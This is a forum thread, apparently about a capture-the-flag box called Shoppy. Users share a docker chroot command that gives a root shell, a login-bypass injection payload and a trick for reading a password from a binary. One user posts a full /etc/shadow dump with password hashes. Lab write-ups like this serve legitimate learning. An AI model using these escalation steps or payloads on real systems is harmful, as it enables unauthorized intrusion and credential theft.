Still working on it

You can sudo -l to check what commands you can run, you'll see you can run as deploy a tool called password-manager. If you strings on the binary you won't see the password but if you just cat it you'll find deploy's password. Then, you are able to use docker, gtfobins to see how to get a shell as root..

I can't figure out tho how you are able to bypass login auth on shoppy Admin, never seen and couldn't find that admin'||"===' payload if someone can explain it to me please)

(September 17, 2022, 10:22 PM)annehathaway Wrote: You can sudo -l to check what commands you can run, you'll see you can run as deploy a tool called password-manager. If you strings on the binary you won't see the password but if you just cat it you'll find deploy's password. Then, you are able to use docker, gtfobins to see how to get a shell as root..

I can't figure out tho how you are able to bypass login auth on shoppy Admin, never seen and couldn't find that admin'||"===' payload if someone can explain it to me please)

cant find the password using cat

You can, it is just before "Access Granted"

Rooted.

root@0c9c5cea3c46:~# cat /etc/shadow
root:$y$j9T$0gd6YLeK1QF8eXOhAGmb2.$rvSHnH5qysjj79l0OiXizdnFwT1vsQzz5U4p/vrHQMB:19195:0:99999:7:::
daemon:*:19195:0:99999:7:::
bin:*:19195:0:99999:7:::
sys:*:19195:0:99999:7:::
sync:*:19195:0:99999:7:::
games:*:19195:0:99999:7:::
man:*:19195:0:99999:7:::
lp:*:19195:0:99999:7:::
mail:*:19195:0:99999:7:::
news:*:19195:0:99999:7:::
uucp:*:19195:0:99999:7:::
proxy:*:19195:0:99999:7:::
www-data:*:19195:0:99999:7:::
backup:*:19195:0:99999:7:::
list:*:19195:0:99999:7:::
irc:*:19195:0:99999:7:::
gnats:*:19195:0:99999:7:::
nobody:*:19195:0:99999:7:::
_apt:*:19195:0:99999:7:::
systemd-network:*:19195:0:99999:7:::
systemd-resolve:*:19195:0:99999:7:::
tss:*:19195:0:99999:7:::
messagebus:*:19195:0:99999:7:::
systemd-timesync:*:19195:0:99999:7:::
usbmux:*:19195:0:99999:7:::
rtkit:*:19195:0:99999:7:::
sshd:*:19195:0:99999:7:::
dnsmasq:*:19195:0:99999:7:::
speech-dispatcher:!:19195:0:99999:7:::
pulse:*:19195:0:99999:7:::
saned:*:19195:0:99999:7:::
colord:*:19195:0:99999:7:::
geoclue:*:19195:0:99999:7:::
Debian-gdm:*:19195:0:99999:7:::
jaeger:$y$j9T$Dd.LPLKhUiqLImmrThQ.m/$zWTCxncUITpaG1GhvvV66fhFWRh2CVz.KtJH4bd1ke.:19195:0:99999:7:::
systemd-coredump:!*:19195::::::
nginx:!:19195:0:99999:7:::
mongodb:*:19195:0:99999:7:::
deploy:$y$j9T$1u25BMNE1Y2tRYy7ne.wg/$mHEZ.4Y9kanC0001s.p5Q8qqzwt9TYgj6nrvaqDlPcB:19195:0:99999:7:::
postgres:*:19195:0:99999:7:::
mattermost:!:19195::::::
root@0c9c5cea3c46:~#

---

After you login the the deploy user run this command.

docker run -v /:/mnt --rm -it alpine chroot /mnt sh

Then you will have root.
Then run bash to get a nice shell

root obtained, thanks. The SQLi payload is not clear to me.

(September 17, 2022, 10:51 PM)Giovanni0 Wrote: root obtained, thanks. The SQLi payload is not clear to me.

 dont get i either. After user it was a piece of cake.

How did u guys find the subdomain? Was there a hint for it? I normally used subdomains-top1mil-20000.txt and that normally worked for every machine. But not for this one.

(September 17, 2022, 11:30 PM)ysoserious Wrote: How did u guys find the subdomain? Was there a hint for it? I normally used subdomains-top1mil-20000.txt and that normally worked for every machine. But not for this one.

Did you get the root

(September 17, 2022, 11:31 PM)dumpster Wrote:

(September 17, 2022, 11:30 PM)ysoserious Wrote: How did u guys find the subdomain? Was there a hint for it? I normally used subdomains-top1mil-20000.txt and that normally worked for every machine. But not for this one.

Did you get the root

Yes